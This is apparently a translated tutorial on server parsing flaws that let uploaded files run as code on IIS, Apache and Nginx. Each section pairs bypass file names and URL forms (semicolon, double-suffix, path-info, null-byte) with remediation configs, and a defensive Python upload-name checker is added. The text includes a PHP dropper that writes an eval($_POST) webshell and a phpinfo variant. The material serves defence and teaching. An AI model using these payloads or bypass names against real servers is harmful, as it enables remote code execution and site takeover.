Server-side parsing vulnerabilities in file upload
IIS 5.x-6.x parsing vulnerability
Servers running IIS 5.x-6.x are mostly Windows Server 2003, hosting fairly old sites that are generally written in ASP; this parsing vulnerability only applies to asp files, not to aspx files.
Directory parsing (IIS 6.0)
Form: www.xxx.com/xx.asp/xx.jpg
Principle: by default the server parses every file under a directory named .asp or .asa as an ASP file.
File parsing
Form: www.xxx.com/xx.asp;.jpg
Principle: by default the server does not parse anything after the semicolon, so xx.asp;.jpg is parsed as an ASP file.
Parsed file types
Besides .asp, the executable file types enabled by default in IIS 6.0 include these three:
/test.asa
/test.cer
/test.cdx
Remediation
1. There is currently no official Microsoft patch; write your own regular expression to block uploads of file names of the form xx.asp;.jpg.
2. Set permissions properly and restrict users from creating folders.
Apache parsing vulnerability
Vulnerability principle
Apache determines how to parse a file by reading its suffixes from right to left: if a suffix is not recognised, it moves one suffix to the left and judges again. For example, in test.php.owf.rar the two suffixes ".owf" and ".rar" are not recognised by Apache, so Apache parses test.php.owf.rar as PHP.
Vulnerability form
www.xxxx.xxx.com/test.php.php123
Other configuration issues leading to this vulnerability
(1) If the Apache configuration contains a line such as AddHandler php5-script .php, then any file whose name contains .php, even test2.php.jpg, is executed as PHP.
(2) If the Apache configuration contains a line such as AddType application/x-httpd-php .jpg, then files with the extension jpg are likewise executed as PHP.
Remediation
1. In the Apache configuration file, forbid execution of file names of the form .php. by adding the following (the dots are escaped so that only a literal "." is matched):
<Files ~ "\.(php\.|php3\.)">
Order Allow,Deny
Deny from all
</Files>
2. Use URL rewriting (pseudo-static) to solve the problem by rewriting file names of the form .php.*: open the Apache httpd.conf, find the line LoadModule rewrite_module modules/mod_rewrite.so, remove the leading #, restart Apache, and create a .htaccess file in the site's root directory with the following content:
<IfModule mod_rewrite.c>
RewriteEngine On
# [NC] makes the match case-insensitive, so one rule covers php, PHP, pHp and every other case variant
RewriteRule \.(php\.|php3\.) /index.php [NC]
</IfModule>
Nginx parsing vulnerability
Vulnerability principle
Nginx supports PHP parsing via CGI by default; the common practice is to set SCRIPT_FILENAME through a regular-expression match in the Nginx configuration file. When the URL www.xx.com/phpinfo.jpg/1.php is requested, $fastcgi_script_name is set to "phpinfo.jpg/1.php", which is then built into SCRIPT_FILENAME and passed to PHP CGI. Why does PHP accept such a parameter and parse phpinfo.jpg as a PHP file? This comes down to the fix_pathinfo option. When it is enabled, the following logic in PHP is triggered:
PHP treats SCRIPT_FILENAME as phpinfo.jpg and 1.php as PATH_INFO, so phpinfo.jpg is parsed as a PHP file.
Vulnerability form
www.xxxx.com/UploadFiles/image/1.jpg/1.php
www.xxxx.com/UploadFiles/image/1.jpg%00.php
www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
xxx.jpg%00.php (Nginx <8.03 null-byte code execution vulnerability)
Another technique: upload a file named test.jpg with the following content.
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
Then request test.jpg/.php, and a one-line webshell, shell.php, is generated in that directory.
Remediation
1. Edit php.ini and set cgi.fix_pathinfo to 0;
2. Add the following to the Nginx configuration file (the leading dot is escaped so that it matches a literal "."):
if ( $fastcgi_script_name ~ \..*/.*php )
{
return 403;
}
This block means that when the URL matches something like test.jpg/a.php, error code 403 is returned.
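A defender-side file-name check, added here as an example and not part of the original article, that models the three parsing rules this page describes (IIS 6.0 semicolon and .asp-directory handling, Apache right-to-left suffix resolution, and nginx/IIS 7.5 path-info with cgi.fix_pathinfo=1) and rejects upload names that any of them would execute. The ALLOWED whitelist and the function names are assumptions for a hypothetical image-upload endpoint.

```python
import re
from urllib.parse import unquote

# Executable suffixes taken from the page: IIS 6.0 defaults and the PHP
# suffixes Apache recognises. ALLOWED is an assumed whitelist for a
# hypothetical image-upload endpoint.
IIS6_EXEC = {"asp", "asa", "cer", "cdx"}
PHP_EXEC = {"php", "php3"}
ALLOWED = {"jpg", "jpeg", "png", "gif"}


def _ext(segment):
    return segment.rpartition(".")[2].lower() if "." in segment else ""


def iis6_effective_ext(path):
    """IIS 6.0: a directory named *.asp/*.asa executes everything below it,
    and everything after ';' in the file name is ignored."""
    *dirs, base = path.split("/")
    for d in dirs:
        if _ext(d) in IIS6_EXEC:
            return _ext(d)
    return _ext(base.split(";", 1)[0])


def apache_effective_ext(path):
    """Apache (default handlers): read suffixes right to left and skip
    unrecognised ones until a known type is found."""
    for ext in reversed(path.rsplit("/", 1)[-1].split(".")[1:]):
        if ext.lower() in PHP_EXEC | ALLOWED:
            return ext.lower()
    return ""


def pathinfo_effective_ext(path):
    """nginx / IIS 7.x with cgi.fix_pathinfo=1: a trailing '/x.php' becomes
    PATH_INFO and the file in front of it is run as PHP."""
    *dirs, base = path.split("/")
    if dirs and _ext(base) in PHP_EXEC:
        return "php"
    return _ext(base)


def is_safe_upload_name(raw_name):
    """Reject names that any of the three rules would execute, plus null
    bytes, path separators and ';' (decoded first so %00 is caught)."""
    name = unquote(raw_name)
    if re.search(r"[\x00/\\;]", name):
        return False
    checks = (iis6_effective_ext, apache_effective_ext, pathinfo_effective_ext)
    return all(f(name) in ALLOWED for f in checks)
```

The per-server helpers show which extension each server would actually act on, so a rejected name can be explained in a log line; the Apache helper assumes default handlers, so the AddHandler/AddType misconfigurations above still need to be fixed in the server itself.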
IIS 7.5 / 8 parsing vulnerability
The IIS 7.5 vulnerability is similar to the Nginx one: both come from cgi.fix_pathinfo being enabled in the PHP configuration file, and neither is a vulnerability in Nginx or IIS 7.5 itself.
https://www.xp.cn/a.php/182.html
After installation, php.ini defaults to cgi.fix_pathinfo = 1; when a request is made with .php appended to the URL path, the file is parsed as PHP, which produces the vulnerability.
Note: before the actual test, I found that the vulnerability did not trigger; later I discovered that FastCGI was turned off, which seems to be what is used to process the file. For defence, set cgi.fix_pathinfo = 0 and turn FastCGI on, so you can play at a more advanced level.
Create a cmd.txt file with the following contents:
<?php
fputs(fopen('shell.php','w'),'<?php phpinfo();?>');
// create a new file
?>
After saving, rename it to cmd.jpg.
Then request it again.
Note
When phpstudy is switched back, it may not run and needs to be reconfigured.